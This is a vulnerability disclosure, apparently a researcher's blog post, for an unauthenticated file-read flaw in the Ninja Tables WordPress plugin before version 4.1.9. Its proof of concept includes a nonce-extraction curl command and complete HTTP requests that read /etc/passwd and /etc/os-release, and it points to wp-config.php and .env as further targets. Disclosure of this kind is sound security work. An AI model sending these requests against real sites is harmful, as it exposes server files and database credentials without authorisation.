Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read [LFI]

Critical SeverityPublished by Muhammad WaseemSecurity Research
← Back to Home

This comprehensive security research details a critical vulnerability discovered in the Ninja Tables WordPress plugin that allows unauthenticated attackers to read arbitrary files from the target server.

Vulnerability Details: Unauthenticated Arbitrary File Read via `ninja_table_force_download`

CVE: Pending Assignment

CVSS Score: 7.5 (High)

Affected Versions: Ninja Tables < 4.1.9

Vulnerability Type: Local File Inclusion (LFI)


The Ninja Tables plugin for WordPress contains a critical vulnerability in the AJAX action `ninja_table_force_download`. The vulnerability stems from insufficient input validation of the `url` parameter, which allows unauthenticated attackers to traverse the file system and read arbitrary files from the server.

Attackers can exploit this vulnerability to access sensitive files including system configuration files (`/etc/passwd`, `/etc/os-release`), application configuration files (`wp-config.php`), environment variables (`.env`), and application logs.

Proof of Concept (PoC) Steps

1. Extract the Nonce

First, we need to extract the public nonce from the target website's source code:


curl -s https://target.com | grep -oP '"ninja_table_public_nonce":"\K[a-z0-9]+'

Expected output:

3d22ded27c
Nonce extraction example

2. Read `/etc/os-release`

HTTP Request

GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/os-release&ninja_table_public_nonce=3d22ded27c HTTP/2
Host: redacted.com
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Server Response

HTTP/2 200 OK
content-type: application/octet-stream

NAME="Ubuntu"
PRETTY_NAME="Ubuntu 22.04.4 LTS"
ID=ubuntu
...

3. Read `/etc/passwd`

Reading /etc/passwd file

HTTP Request

GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/passwd&ninja_table_public_nonce=3d22ded27c HTTP/2
Host: redacted.com
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Server Response

HTTP/2 200 OK
content-type: application/octet-stream

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Security Impact

  • Unauthenticated Local File Read
  • Disclosure of sensitive server files (/etc/passwd, /wp-config.php, .env, logs)
  • May lead to database credential leakage, full site compromise, or privilege escalation

Remediation

Update the Ninja Tables plugin to version 4.1.9 or higher where this issue has been patched.

References

← Back to Home